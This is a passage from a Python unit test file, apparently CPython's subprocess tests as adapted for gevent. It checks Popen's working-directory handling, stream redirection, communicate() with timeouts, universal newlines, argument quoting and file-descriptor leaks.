self.assertEqual(out.rstrip(), b'test_stdout_none') def test_stderr_none(self): # .stderr is None when not redirected p = subprocess.Popen([sys.executable, "-c", 'print("banana")'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stdin.close) p.wait() self.assertEqual(p.stderr, None) def _assert_python(self, pre_args, **kwargs): # We include sys.exit() to prevent the test runner from hanging # whenever python is found. args = pre_args + ["import sys; sys.exit(47)"] p = subprocess.Popen(args, **kwargs) p.wait() self.assertEqual(47, p.returncode) def test_executable(self): # Check that the executable argument works. # # On Unix (non-Mac and non-Windows), Python looks at args[0] to # determine where its standard library is, so we need the directory # of args[0] to be valid for the Popen() call to Python to succeed. # See also issue #16170 and issue #7774. doesnotexist = os.path.join(os.path.dirname(sys.executable), "doesnotexist") self._assert_python([doesnotexist, "-c"], executable=sys.executable) def test_executable_takes_precedence(self): # Check that the executable argument takes precedence over args[0]. # # Verify first that the call succeeds without the executable arg. 
pre_args = [sys.executable, "-c"] self._assert_python(pre_args) self.assertRaises(FileNotFoundError, self._assert_python, pre_args, executable="doesnotexist") @unittest.skipIf(mswindows, "executable argument replaces shell") def test_executable_replaces_shell(self): # Check that the executable argument replaces the default shell # when shell=True. self._assert_python([], executable=sys.executable, shell=True) # For use in the test_cwd* tests below. def _normalize_cwd(self, cwd): # Normalize an expected cwd (for Tru64 support). # We can't use os.path.realpath since it doesn't expand Tru64 {memb} # strings. See bug #1063571. original_cwd = os.getcwd() os.chdir(cwd) cwd = os.getcwd() os.chdir(original_cwd) return cwd # For use in the test_cwd* tests below. def _split_python_path(self): # Return normalized (python_dir, python_base). python_path = os.path.realpath(sys.executable) return os.path.split(python_path) # For use in the test_cwd* tests below. def _assert_cwd(self, expected_cwd, python_arg, **kwargs): # Invoke Python via Popen, and assert that (1) the call succeeds, # and that (2) the current working directory of the child process # matches *expected_cwd*. p = subprocess.Popen([python_arg, "-c", "import os, sys; " "sys.stdout.write(os.getcwd()); " "sys.exit(47)"], stdout=subprocess.PIPE, **kwargs) self.addCleanup(p.stdout.close) p.wait() self.assertEqual(47, p.returncode) normcase = os.path.normcase self.assertEqual(normcase(expected_cwd), normcase(p.stdout.read().decode("utf-8"))) def test_cwd(self): # Check that cwd changes the cwd for the child process. temp_dir = tempfile.gettempdir() temp_dir = self._normalize_cwd(temp_dir) self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir) @unittest.skipIf(mswindows, "pending resolution of issue #15533") def test_cwd_with_relative_arg(self): # Check that Popen looks for args[0] relative to cwd if args[0] # is relative. python_dir, python_base = self._split_python_path() rel_python = os.path.join(os.curdir, python_base) with support.temp_cwd('test_cwd_with_relative_arg', quiet=True) as wrong_dir: # gevent: use distinct name, avoid Travis CI failure # Before calling with the correct cwd, confirm that the call fails # without cwd and with the wrong cwd. self.assertRaises(FileNotFoundError, subprocess.Popen, [rel_python]) self.assertRaises(FileNotFoundError, subprocess.Popen, [rel_python], cwd=wrong_dir) python_dir = self._normalize_cwd(python_dir) self._assert_cwd(python_dir, rel_python, cwd=python_dir) @unittest.skipIf(mswindows, "pending resolution of issue #15533") def test_cwd_with_relative_executable(self): # Check that Popen looks for executable relative to cwd if executable # is relative (and that executable takes precedence over args[0]). python_dir, python_base = self._split_python_path() rel_python = os.path.join(os.curdir, python_base) doesntexist = "somethingyoudonthave" with support.temp_cwd('test_cwd_with_relative_executable', quiet=True) as wrong_dir: # gevent: use distinct name, avoid Travis CI failure # Before calling with the correct cwd, confirm that the call fails # without cwd and with the wrong cwd. 
self.assertRaises(FileNotFoundError, subprocess.Popen, [doesntexist], executable=rel_python) self.assertRaises(FileNotFoundError, subprocess.Popen, [doesntexist], executable=rel_python, cwd=wrong_dir) python_dir = self._normalize_cwd(python_dir) self._assert_cwd(python_dir, doesntexist, executable=rel_python, cwd=python_dir) def test_cwd_with_absolute_arg(self): # Check that Popen can find the executable when the cwd is wrong # if args[0] is an absolute path. python_dir, python_base = self._split_python_path() abs_python = os.path.join(python_dir, python_base) rel_python = os.path.join(os.curdir, python_base) with script_helper.temp_dir() as wrong_dir: # Before calling with an absolute path, confirm that using a # relative path fails. self.assertRaises(FileNotFoundError, subprocess.Popen, [rel_python], cwd=wrong_dir) wrong_dir = self._normalize_cwd(wrong_dir) self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir) @unittest.skipIf(sys.base_prefix != sys.prefix, 'Test is not venv-compatible') def test_executable_with_cwd(self): python_dir, python_base = self._split_python_path() python_dir = self._normalize_cwd(python_dir) self._assert_cwd(python_dir, "somethingyoudonthave", executable=sys.executable, cwd=python_dir) @unittest.skipIf(sys.base_prefix != sys.prefix, 'Test is not venv-compatible') @unittest.skipIf(sysconfig.is_python_build(), "need an installed Python. See #7774") def test_executable_without_cwd(self): # For a normal installation, it should work without 'cwd' # argument. For test runs in the build directory, see #7774. self._assert_cwd(os.getcwd(), "somethingyoudonthave", executable=sys.executable) def test_stdin_pipe(self): # stdin redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=subprocess.PIPE) p.stdin.write(b"pear") p.stdin.close() p.wait() self.assertEqual(p.returncode, 1) def test_stdin_filedes(self): # stdin is set to open file descriptor tf = tempfile.TemporaryFile() self.addCleanup(tf.close) d = tf.fileno() os.write(d, b"pear") os.lseek(d, 0, 0) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=d) p.wait() self.assertEqual(p.returncode, 1) def test_stdin_fileobj(self): # stdin is set to open file object tf = tempfile.TemporaryFile() self.addCleanup(tf.close) tf.write(b"pear") tf.seek(0) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=tf) p.wait() self.assertEqual(p.returncode, 1) def test_stdout_pipe(self): # stdout redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), b"orange") def test_stdout_filedes(self): # stdout is set to open file descriptor tf = tempfile.TemporaryFile() self.addCleanup(tf.close) d = tf.fileno() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=d) p.wait() os.lseek(d, 0, 0) self.assertEqual(os.read(d, 1024), b"orange") def test_stdout_fileobj(self): # stdout is set to open file object tf = tempfile.TemporaryFile() self.addCleanup(tf.close) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("orange")'], stdout=tf) p.wait() tf.seek(0) self.assertEqual(tf.read(), b"orange") def test_stderr_pipe(self): # stderr redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=subprocess.PIPE) self.addCleanup(p.stderr.close) 
self.assertStderrEqual(p.stderr.read(), b"strawberry") def test_stderr_filedes(self): # stderr is set to open file descriptor tf = tempfile.TemporaryFile() self.addCleanup(tf.close) d = tf.fileno() p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=d) p.wait() os.lseek(d, 0, 0) self.assertStderrEqual(os.read(d, 1024), b"strawberry") def test_stderr_fileobj(self): # stderr is set to open file object tf = tempfile.TemporaryFile() self.addCleanup(tf.close) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'], stderr=tf) p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), b"strawberry") def test_stdout_stderr_pipe(self): # capture stdout and stderr to the same pipe p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) self.addCleanup(p.stdout.close) self.assertStderrEqual(p.stdout.read(), b"appleorange") def test_stdout_stderr_file(self): # capture stdout and stderr to the same open file tf = tempfile.TemporaryFile() self.addCleanup(tf.close) p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdout=tf, stderr=tf) p.wait() tf.seek(0) self.assertStderrEqual(tf.read(), b"appleorange") def test_stdout_filedes_of_stdout(self): # stdout is set to 1 (#1531862). # To avoid printing the text on stdout, we do something similar to # test_stdout_none (see above). The parent subprocess calls the child # subprocess passing stdout=1, and this test uses stdout=PIPE in # order to capture and check the output of the parent. See #11963. code = ('import sys, subprocess; ' 'rc = subprocess.call([sys.executable, "-c", ' ' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), ' 'b\'test with stdout=1\'))"], stdout=1); ' 'assert rc == 18') p = subprocess.Popen([sys.executable, "-c", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) out, err = p.communicate() self.assertEqual(p.returncode, 0, err) self.assertEqual(out.rstrip(), b'test with stdout=1') def test_stdout_devnull(self): p = subprocess.Popen([sys.executable, "-c", 'for i in range(10240):' 'print("x" * 1024)'], stdout=subprocess.DEVNULL) p.wait() self.assertEqual(p.stdout, None) def test_stderr_devnull(self): p = subprocess.Popen([sys.executable, "-c", 'import sys\n' 'for i in range(10240):' 'sys.stderr.write("x" * 1024)'], stderr=subprocess.DEVNULL) p.wait() self.assertEqual(p.stderr, None) def test_stdin_devnull(self): p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdin.read(1)'], stdin=subprocess.DEVNULL) p.wait() self.assertEqual(p.stdin, None) def test_env(self): newenv = os.environ.copy() newenv["FRUIT"] = "orange" with subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getenv("FRUIT"))'], stdout=subprocess.PIPE, env=newenv) as p: stdout, stderr = p.communicate() self.assertEqual(stdout, b"orange") # Windows requires at least the SYSTEMROOT environment variable to start # Python @unittest.skipIf(sys.platform == 'win32', 'cannot test an empty env on Windows') @unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None, 'the python library cannot be loaded ' 'with an empty environment') def test_empty_env(self): with subprocess.Popen([sys.executable, "-c", 'import os; ' 'print(list(os.environ.keys()))'], 
stdout=subprocess.PIPE, env={}) as p: stdout, stderr = p.communicate() self.assertIn(stdout.strip(), (b"[]", # Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty # environment b"['__CF_USER_TEXT_ENCODING']")) def test_communicate_stdin(self): p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.exit(sys.stdin.read() == "pear")'], stdin=subprocess.PIPE) p.communicate(b"pear") self.assertEqual(p.returncode, 1) def test_communicate_stdout(self): p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stdout.write("pineapple")'], stdout=subprocess.PIPE) (stdout, stderr) = p.communicate() self.assertEqual(stdout, b"pineapple") self.assertEqual(stderr, None) def test_communicate_stderr(self): p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.stderr.write("pineapple")'], stderr=subprocess.PIPE) (stdout, stderr) = p.communicate() self.assertEqual(stdout, None) self.assertStderrEqual(stderr, b"pineapple") def test_communicate(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stderr.write("pineapple");' 'sys.stdout.write(sys.stdin.read())'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) (stdout, stderr) = p.communicate(b"banana") self.assertEqual(stdout, b"banana") self.assertStderrEqual(stderr, b"pineapple") def test_communicate_timeout(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os,time;' 'sys.stderr.write("pineapple\\n");' 'time.sleep(1);' 'sys.stderr.write("pear\\n");' 'sys.stdout.write(sys.stdin.read())'], universal_newlines=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana", timeout=0.3) # Make sure we can keep waiting for it, and that we get the whole output # after it completes. (stdout, stderr) = p.communicate() self.assertEqual(stdout, "banana") self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n") def test_communicate_timeout_large_ouput(self): # Test an expiring timeout while the child is outputting lots of data. p = subprocess.Popen([sys.executable, "-c", 'import sys,os,time;' 'sys.stdout.write("a" * (64 * 1024));' 'time.sleep(0.2);' 'sys.stdout.write("a" * (64 * 1024));' 'time.sleep(0.2);' 'sys.stdout.write("a" * (64 * 1024));' 'time.sleep(0.2);' 'sys.stdout.write("a" * (64 * 1024));'], stdout=subprocess.PIPE) self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4) (stdout, _) = p.communicate() self.assertEqual(len(stdout), 4 * 64 * 1024) # Test for the fd leak reported in http://bugs.python.org/issue2791. 
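    # Every combination of PIPE vs. inherited stdin/stdout/stderr is exercised
    # below, and communicate() must leave any pipe it created closed afterwards.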
def test_communicate_pipe_fd_leak(self): for stdin_pipe in (False, True): for stdout_pipe in (False, True): for stderr_pipe in (False, True): options = {} if stdin_pipe: options['stdin'] = subprocess.PIPE if stdout_pipe: options['stdout'] = subprocess.PIPE if stderr_pipe: options['stderr'] = subprocess.PIPE if not options: continue p = subprocess.Popen((sys.executable, "-c", "pass"), **options) p.communicate() if p.stdin is not None: self.assertTrue(p.stdin.closed) if p.stdout is not None: self.assertTrue(p.stdout.closed) if p.stderr is not None: self.assertTrue(p.stderr.closed) def test_communicate_returns(self): # communicate() should return None if no redirection is active p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(47)"]) (stdout, stderr) = p.communicate() self.assertEqual(stdout, None) self.assertEqual(stderr, None) def test_communicate_pipe_buf(self): # communicate() with writes larger than pipe_buf # This test will probably deadlock rather than fail, if # communicate() does not work properly. x, y = os.pipe() os.close(x) os.close(y) p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(sys.stdin.read(47));' 'sys.stderr.write("x" * %d);' 'sys.stdout.write(sys.stdin.read())' % support.PIPE_MAX_SIZE], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) string_to_write = b"a" * support.PIPE_MAX_SIZE (stdout, stderr) = p.communicate(string_to_write) self.assertEqual(stdout, string_to_write) def test_writes_before_communicate(self): # stdin.write before communicate() p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(sys.stdin.read())'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) p.stdin.write(b"banana") (stdout, stderr) = p.communicate(b"split") self.assertEqual(stdout, b"bananasplit") self.assertStderrEqual(stderr, b"") def test_universal_newlines(self): p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + 'buf = sys.stdout.buffer;' 'buf.write(sys.stdin.readline().encode());' 'buf.flush();' 'buf.write(b"line2\\n");' 'buf.flush();' 'buf.write(sys.stdin.read().encode());' 'buf.flush();' 'buf.write(b"line4\\n");' 'buf.flush();' 'buf.write(b"line5\\r\\n");' 'buf.flush();' 'buf.write(b"line6\\r");' 'buf.flush();' 'buf.write(b"\\nline7");' 'buf.flush();' 'buf.write(b"\\nline8");'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=1) p.stdin.write("line1\n") p.stdin.flush() self.assertEqual(p.stdout.readline(), "line1\n") p.stdin.write("line3\n") p.stdin.close() self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.readline(), "line2\n") self.assertEqual(p.stdout.read(6), "line3\n") self.assertEqual(p.stdout.read(), "line4\nline5\nline6\nline7\nline8") def test_universal_newlines_communicate(self): # universal newlines through communicate() p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + 'buf = sys.stdout.buffer;' 'buf.write(b"line2\\n");' 'buf.flush();' 'buf.write(b"line4\\n");' 'buf.flush();' 'buf.write(b"line5\\r\\n");' 'buf.flush();' 'buf.write(b"line6\\r");' 'buf.flush();' 'buf.write(b"\\nline7");' 'buf.flush();' 'buf.write(b"\\nline8");'], stderr=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=1) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) (stdout, stderr) = p.communicate() 
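        # The child wrote a mixture of \n, \r\n and \r line endings; in
        # universal newlines mode they must all come back as plain \n.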
self.assertEqual(stdout, "line2\nline4\nline5\nline6\nline7\nline8") def test_universal_newlines_communicate_stdin(self): # universal newlines through communicate(), with only stdin p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + textwrap.dedent(''' s = sys.stdin.readline() assert s == "line1\\n", repr(s) s = sys.stdin.read() assert s == "line3\\n", repr(s) ''')], stdin=subprocess.PIPE, universal_newlines=1) (stdout, stderr) = p.communicate("line1\nline3\n") self.assertEqual(p.returncode, 0) def test_universal_newlines_communicate_input_none(self): # Test communicate(input=None) with universal newlines. # # We set stdout to PIPE because, as of this writing, a different # code path is tested when the number of pipes is zero or one. p = subprocess.Popen([sys.executable, "-c", "pass"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=True) p.communicate() self.assertEqual(p.returncode, 0) def test_universal_newlines_communicate_stdin_stdout_stderr(self): # universal newlines through communicate(), with stdin, stdout, stderr p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' + SETBINARY + textwrap.dedent(''' s = sys.stdin.buffer.readline() sys.stdout.buffer.write(s) sys.stdout.buffer.write(b"line2\\r") sys.stderr.buffer.write(b"eline2\\n") s = sys.stdin.buffer.read() sys.stdout.buffer.write(s) sys.stdout.buffer.write(b"line4\\n") sys.stdout.buffer.write(b"line5\\r\\n") sys.stderr.buffer.write(b"eline6\\r") sys.stderr.buffer.write(b"eline7\\r\\nz") ''')], stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=True) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) (stdout, stderr) = p.communicate("line1\nline3\n") self.assertEqual(p.returncode, 0) self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout) # Python debug build push something like "[42442 refs]\n" # to stderr at exit of subprocess. # Don't use assertStderrEqual because it strips CR and LF from output. self.assertTrue(stderr.startswith("eline2\neline6\neline7\n")) def test_universal_newlines_communicate_encodings(self): # Check that universal newlines mode works for various encodings, # in particular for encodings in the UTF-16 and UTF-32 families. # See issue #15595. # # UTF-16 and UTF-32-BE are sufficient to check both with BOM and # without, and UTF-16 and UTF-32. import _bootlocale for encoding in ['utf-16', 'utf-32-be']: old_getpreferredencoding = _bootlocale.getpreferredencoding # Indirectly via io.TextIOWrapper, Popen() defaults to # locale.getpreferredencoding(False) and earlier in Python 3.2 to # locale.getpreferredencoding(). def getpreferredencoding(do_setlocale=True): return encoding code = ("import sys; " r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" % encoding) args = [sys.executable, '-c', code] try: _bootlocale.getpreferredencoding = getpreferredencoding # We set stdin to be non-None because, as of this writing, # a different code path is used when the number of pipes is # zero or one. 
popen = subprocess.Popen(args, universal_newlines=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE) stdout, stderr = popen.communicate(input='') finally: _bootlocale.getpreferredencoding = old_getpreferredencoding self.assertEqual(stdout, '1\n2\n3\n4') def test_no_leaking(self): # Make sure we leak no resources if not mswindows: max_handles = 1026 # too much for most UNIX systems else: max_handles = 2050 # too much for (at least some) Windows setups handles = [] tmpdir = tempfile.mkdtemp() try: for i in range(max_handles): try: tmpfile = os.path.join(tmpdir, support.TESTFN) handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT)) except OSError as e: if e.errno != errno.EMFILE: raise break else: self.skipTest("failed to reach the file descriptor limit " "(tried %d)" % max_handles) # Close a couple of them (should be enough for a subprocess) for i in range(10): os.close(handles.pop()) # Loop creating some subprocesses. If one of them leaks some fds, # the next loop iteration will fail by reaching the max fd limit. for i in range(15): p = subprocess.Popen([sys.executable, "-c", "import sys;" "sys.stdout.write(sys.stdin.read())"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) data = p.communicate(b"lime")[0] self.assertEqual(data, b"lime") finally: for h in handles: os.close(h) shutil.rmtree(tmpdir) def test_list2cmdline(self): self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']), '"a b c" d e') self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']), 'ab\\"c \\ d') self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']), 'ab\\"c " \\\\" d') self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']), 'a\\\\\\b "de fg" h') self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']), 'a\\\\\\"b c d') self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']), '"a\\\\b c" d e') self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']), '"a\\\\b\\ c" d e') self.assertEqual(subprocess.list2cmdline(['ab', '']), 'ab ""') def test_poll(self): p = subprocess.Popen([sys.executable, "-c", "import os; os.read(0, 1)"], stdin=subprocess.PIPE) self.addCleanup(p.stdin.close) self.assertIsNone(p.poll()) os.write(p.stdin.fileno(), b'A') p.wait() # Subsequent invocations should just return the returncode self.assertEqual(p.poll(), 0) def test_wait(self): p = subprocess.Popen([sys.executable, "-c", "pass"]) self.assertEqual(p.wait(), 0) # Subsequent invocations should just return the returncode self.assertEqual(p.wait(), 0) def test_wait_timeout(self): p = subprocess.Popen([sys.executable, "-c", "import time; time.sleep(0.3)"]) with self.assertRaises(subprocess.TimeoutExpired) as c: p.wait(timeout=0.0001) self.assertIn("0.0001", str(c.exception)) # For coverage of __str__. # Some heavily loaded buildbots (sparc Debian 3.x) require this much # time to start. self.assertEqual(p.wait(timeout=3), 0) def test_invalid_bufsize(self): # an invalid type of the bufsize argument should raise # TypeError. with self.assertRaises(TypeError): subprocess.Popen([sys.executable, "-c", "pass"], "orange") def test_bufsize_is_none(self): # bufsize=None should be the same as bufsize=0. 
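        # bufsize is the second positional parameter of Popen, so the value is
        # also checked here when passed positionally.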
p = subprocess.Popen([sys.executable, "-c", "pass"], None) self.assertEqual(p.wait(), 0) # Again with keyword arg p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None) self.assertEqual(p.wait(), 0) def _test_bufsize_equal_one(self, line, expected, universal_newlines): # subprocess may deadlock with bufsize=1, see issue #21332 with subprocess.Popen([sys.executable, "-c", "import sys;" "sys.stdout.write(sys.stdin.readline());" "sys.stdout.flush()"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, bufsize=1, universal_newlines=universal_newlines) as p: p.stdin.write(line) # expect that it flushes the line in text mode os.close(p.stdin.fileno()) # close it without flushing the buffer read_line = p.stdout.readline() try: p.stdin.close() except OSError: pass p.stdin = None self.assertEqual(p.returncode, 0) self.assertEqual(read_line, expected) def test_bufsize_equal_one_text_mode(self): # line is flushed in text mode with bufsize=1. # we should get the full line in return line = "line\n" self._test_bufsize_equal_one(line, line, universal_newlines=True) def test_bufsize_equal_one_binary_mode(self): # line is not flushed in binary mode with bufsize=1. # we should get empty response line = b'line' + os.linesep.encode() # assume ascii-based locale self._test_bufsize_equal_one(line, b'', universal_newlines=False) def test_leaking_fds_on_error(self): # see bug #5179: Popen leaks file descriptors to PIPEs if # the child fails to execute; this will eventually exhaust # the maximum number of open fds. 1024 seems a very common # value for that limit, but Windows has 2048, so we loop # 1024 times (each call leaked two fds). for i in range(1024): with self.assertRaises(OSError) as c: subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) # ignore errors that indicate the command was not found if c.exception.errno not in (errno.ENOENT, errno.EACCES): raise c.exception @unittest.skipIf(threading is None, "threading required") def test_double_close_on_error(self): # Issue #18851 fds = [] def open_fds(): for i in range(20): fds.extend(os.pipe()) time.sleep(0.001) t = threading.Thread(target=open_fds) t.start() try: with self.assertRaises(EnvironmentError): subprocess.Popen(['nonexisting_i_hope'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) finally: t.join() exc = None for fd in fds: # If a double close occurred, some of those fds will # already have been closed by mistake, and os.close() # here will raise. try: os.close(fd) except OSError as e: exc = e if exc is not None: raise exc @unittest.skipIf(threading is None, "threading required") def test_threadsafe_wait(self): """Issue21291: Popen.wait() needs to be threadsafe for returncode.""" proc = subprocess.Popen([sys.executable, '-c', 'import time; time.sleep(12)']) self.assertEqual(proc.returncode, None) results = [] def kill_proc_timer_thread(): results.append(('thread-start-poll-result', proc.poll())) # terminate it from the thread and wait for the result. proc.kill() proc.wait() results.append(('thread-after-kill-and-wait', proc.returncode)) # this wait should be a no-op given the above. proc.wait() results.append(('thread-after-second-wait', proc.returncode)) # This is a timing sensitive test, the failure mode is # triggered when both the main thread and this thread are in # the wait() call at once. The delay here is to allow the # main thread to most likely be blocked in its wait() call. 
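        # Kill the child from a timer thread after a short delay, while the
        # main thread is expected to be blocked in its own wait() call below.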
t = threading.Timer(0.2, kill_proc_timer_thread) t.start() if mswindows: expected_errorcode = 1 else: # Should be -9 because of the proc.kill() from the thread. expected_errorcode = -9 # Wait for the process to finish; the thread should kill it # long before it finishes on its own. Supplying a timeout # triggers a different code path for better coverage. proc.wait(timeout=20) self.assertEqual(proc.returncode, expected_errorcode, msg="unexpected result in wait from main thread") # This should be a no-op with no change in returncode. proc.wait() self.assertEqual(proc.returncode, expected_errorcode, msg="unexpected result in second main wait.") t.join() # Ensure that all of the thread results are as expected. # When a race condition occurs in wait(), the returncode could # be set by the wrong thread that doesn't actually have it # leading to an incorrect value. self.assertEqual([('thread-start-poll-result', None), ('thread-after-kill-and-wait', expected_errorcode), ('thread-after-second-wait', expected_errorcode)], results) def test_issue8780(self): # Ensure that stdout is inherited from the parent # if stdout=PIPE is not used code = ';'.join(( 'import subprocess, sys', 'retcode = subprocess.call(' "[sys.executable, '-c', 'print(\"Hello World!\")'])", 'assert retcode == 0')) output = subprocess.check_output([sys.executable, '-c', code]) self.assertTrue(output.startswith(b'Hello World!'), ascii(output)) def test_handles_closed_on_exception(self): # If CreateProcess exits with an error, ensure the # duplicate output handles are released ifhandle, ifname = mkstemp() ofhandle, ofname = mkstemp() efhandle, efname = mkstemp() try: subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle, stderr=efhandle) except OSError: os.close(ifhandle) os.remove(ifname) os.close(ofhandle) os.remove(ofname) os.close(efhandle) os.remove(efname) self.assertFalse(os.path.exists(ifname)) self.assertFalse(os.path.exists(ofname)) self.assertFalse(os.path.exists(efname)) def test_communicate_epipe(self): # Issue 10963: communicate() should hide EPIPE p = subprocess.Popen([sys.executable, "-c", 'pass'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) p.communicate(b"x" * 2**20) def test_communicate_epipe_only_stdin(self): # Issue 10963: communicate() should hide EPIPE p = subprocess.Popen([sys.executable, "-c", 'pass'], stdin=subprocess.PIPE) self.addCleanup(p.stdin.close) p.wait() p.communicate(b"x" * 2**20) @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), "Requires signal.SIGUSR1") @unittest.skipUnless(hasattr(os, 'kill'), "Requires os.kill") @unittest.skipUnless(hasattr(os, 'getppid'), "Requires os.getppid") def test_communicate_eintr(self): # Issue #12493: communicate() should handle EINTR def handler(signum, frame): pass old_handler = signal.signal(signal.SIGUSR1, handler) self.addCleanup(signal.signal, signal.SIGUSR1, old_handler) args = [sys.executable, "-c", 'import os, signal;' 'os.kill(os.getppid(), signal.SIGUSR1)'] for stream in ('stdout', 'stderr'): kw = {stream: subprocess.PIPE} with subprocess.Popen(args, **kw) as process: # communicate() will be interrupted by SIGUSR1 process.communicate() # This test is Linux-ish specific for simplicity to at least have # some coverage. It is not a platform specific bug. 
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()), "Linux specific") def test_failed_child_execute_fd_leak(self): """Test for the fork() failure fd leak reported in issue16327.""" fd_directory = '/proc/%d/fd' % os.getpid() fds_before_popen = os.listdir(fd_directory) with self.assertRaises(PopenTestException): PopenExecuteChildRaises( [sys.executable, '-c', 'pass'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # NOTE: This test doesn't verify that the real _execute_child # does not close the file descriptors itself on the way out # during an exception. Code inspection has confirmed that. fds_after_exception = os.listdir(fd_directory) self.assertEqual(fds_before_popen, fds_after_exception) @unittest.skipIf(mswindows, "POSIX specific tests") class POSIXProcessTestCase(BaseTestCase): def setUp(self): super().setUp() self._nonexistent_dir = "/_this/pa.th/does/not/exist" def _get_chdir_exception(self): try: os.chdir(self._nonexistent_dir) except OSError as e: # This avoids hard coding the errno value or the OS perror() # string and instead capture the exception that we want to see # below for comparison. desired_exception = e desired_exception.strerror += ': ' + repr(self._nonexistent_dir) else: self.fail("chdir to nonexistant directory %s succeeded." % self._nonexistent_dir) return desired_exception def test_exception_cwd(self): """Test error in the child raised in the parent for a bad cwd.""" desired_exception = self._get_chdir_exception() try: p = subprocess.Popen([sys.executable, "-c", ""], cwd=self._nonexistent_dir) except OSError as e: # Test that the child process chdir failure actually makes # it up to the parent process as the correct exception. self.assertEqual(desired_exception.errno, e.errno) self.assertEqual(desired_exception.strerror, e.strerror) else: self.fail("Expected OSError: %s" % desired_exception) def test_exception_bad_executable(self): """Test error in the child raised in the parent for a bad executable.""" desired_exception = self._get_chdir_exception() try: p = subprocess.Popen([sys.executable, "-c", ""], executable=self._nonexistent_dir) except OSError as e: 